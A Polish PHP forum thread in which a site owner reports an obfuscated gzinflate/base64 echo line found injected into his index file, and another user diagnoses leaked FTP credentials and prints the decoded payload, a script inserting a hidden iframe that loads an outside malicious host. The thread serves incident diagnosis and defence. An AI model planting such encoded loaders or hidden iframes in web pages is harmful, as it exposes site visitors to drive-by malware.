Pomoc - Szukaj - Użytkownicy - Kalendarz
Pełna wersja: [PHP] Czy to exploit?
Forum PHP.pl > Forum > Przedszkole
desavil
Witam, na mojej stronie (do, której jeszcze 2 osoby mają dostęp do ftp) znalazłem taki wpis w indexie, prawie na samej górze:
  1. #d93065#
  2. echo(gzinflate(base64_decode("tVVNb5tAEP0t5WKohcsC+4HI9tJTL730iHxwbZyQiW0KxFZk5b93ZlgcO8VpVCmyQbO7s2/ezLxlb9plU9Xd16VNQpFXNhShmC7z2taLpi2/b7u8Wvu170XCm3oxPokXWGtNEnTN0/HH4+ZX2fhB4dUNru264fVUl9589vt5ueiWd355Wx5u21VwRKxDtV3tDrPVbvm4KbddsLbFJExioEeloA
    SEGYQCZAY6AmlAK1AGVAQKZyRIUDGN0IxxWvPK2bpOIZZgIkgTkIqcE80G+yBwGIPUjJ2RGw7RRDyQZBl
    kgrgDoxdWOnlBQRuBIhDmwtmkxJ2YaKJB4bIxwOupaUPYGBBHjq0GkY1QQGQMQTMGYs5CJZw+/gUILAv+0MKdfTjV46YUJeHIzCBik8MbEBHwdoLiQlEUM2BImu9j4Ua3TLAR8xsYvPbQnI2JXK/6Za0dG8JmW2mXN3oS/cSFlZkrEBYbSRHhdKhQyoll5I+FkVx13ZdfuRKKk0YEzaCnZiTJSOI0gZxiwaUeKXbMfRjt99mQNnEtp
    blgF2ZvSGhEHpqzIYfMHYeY+31dNrKXTcT7OO3Ro9GLf0RLcZ8bTksnXOpjOugpcV06FbUHOukP7eSjFH
    hB7FxH8h8aOh2KVzLCyeuIV/TVY12T2FuI59pzyn+bwaDLcef3dubyzA79cWfyf3r99zEfA33/h+4Dv+GST4FgFTEg+sTKKQFjSb5e1Oj3ezIvovmsrR+qzp/AJMj31ivxOtsv8PXg5c94ge2D0vaXWLGf5we7zltbzPPG/uyaanubr3eNn0ulP9kqr6ZWBMd7tFrbTpvCWyMO35Sbb/i+W5BN1m6F96V/KO7nn8U0FQFHKoPSb4P85ou7o/8A"
    )));
  3. #/d93065#

Nie wiem czy to błąd w moim CMSie (dostęp do wpisów na stronie tylko admini, użytkownicy nic) jakiś, czy to własnie któryś z użyszkodników mających dostęp do FTP wrzucił... a niestety nie mam możliwości ich zapytania.
Pozdrawiam i liczę na pomoc.

PS. Co ten kod, może zrobić?
maniana
Było niedawno. Zmień szybko dane do FTP i wpisuj je z pamięci.
desavil
Czyli to u kolegów coś smile.gif Ja nigdy nie zapamiętuję.
Na 100% to nie błąd w skrypcie/CMSie?
maniana
To zalezy czego używasz. Jak jakiegoś systemu powszechnego to zaktualizuj do najnowszej wersji albo poszperaj w necie pod kontem wykrytych dziur. Jeśli to jakis twój sktypt to przejrzyj logi serwera.

Na 99% jest wyciek hasła z jakiego programu ftp.

Sedzi tam jakiś mały malware. Po rozkodowaniu wygląda tak:
  1. if(document.getElementsByTagName('body')[0]){
  2. iframer();
  3. }else{
  4. document.write("<iframe src='http://pidohis.ru/count13.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
  5. }
  6. function iframer(){
  7. var f = document.createElement('iframe');
  8. f.setAttribute('src','http://pidohis.ru/count13.php');
  9. f.style.visibility='hidden';
  10. f.style.position='absolute';
  11. f.style.left='0';
  12. f.style.top='0';
  13. f.setAttribute('width','10');
  14. f.setAttribute('height','10');
  15. document.getElementsByTagName('body')[0].appendChild(f);
  16. }
To jest wersja lo-fi głównej zawartości. Aby zobaczyć pełną wersję z większą zawartością, obrazkami i formatowaniem proszę kliknij tutaj.
Invision Power Board © 2001-2025 Invision Power Services, Inc.